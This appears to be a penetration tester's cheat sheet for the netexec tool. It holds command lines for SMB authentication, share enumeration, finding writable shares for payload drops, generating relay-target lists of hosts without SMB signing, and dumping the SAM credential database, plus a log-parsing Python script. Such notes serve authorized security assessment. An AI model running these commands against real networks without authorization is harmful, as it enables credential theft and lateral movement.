netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks."
Basic SMB auth
nxc smb somehost -u user -p 'Winter2027!'
Basic SMB auth (Kerberos)
I like to use getTGT, then export KRB5CCNAME=user.ccache and then:
nxc smb somehost -u user -p 'Winter2027!' -k
Turn on logging
To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:
log_mode = True
Change the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:
pwn3d_label = Compromised!
Find shares
nxc smb pcs.txt -u 'username' -p 'password' --shares
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.
grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
Once you create nosigning.txt you can use this script to resolve all the IPs to an alphabetical, case insensitive list.
Find hosts with/without SMB signing (alternate way)
grep for anything where signing is set to false
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:
cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt
Find hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
Find pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
Dump SAM database
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
Take the log and extract hostnames and IPs for JUST hosts running WebClient:
Probably should move this to scripts dir at somepoint
import socket
import re
# Function to perform nslookup and return hostname or IP if lookup fails
def get_hostname(ip):
try:
return socket.gethostbyaddr(ip)[0]
except socket.herror:
return ip # If no hostname is found, return the IP
# Prompt the user for the log file and the output CSV file
log_file = input("Enter the log file name (with extension): ")
output_file = input("Enter the output CSV file name (with .csv extension): ")
# Initialize list to store the results
output_list = []
# Regex pattern to match lines with "WebClient Service enabled" and extract the IP address
pattern = re.compile(r"WebClient Service enabled on: (\d+\.\d+\.\d+\.\d+)")
# Process the log file
with open(log_file, 'r') as file:
for line in file:
match = pattern.search(line)
if match:
ip = match.group(1)
hostname = get_hostname(ip)
output_list.append(f"{hostname},{ip},enabled")
# Sort the output by hostname
output_list.sort()
# Write the results to the output CSV file
with open(output_file, 'w') as file:
for entry in output_list:
file.write(f"{entry}\n")
print(f"Output written to {output_file}")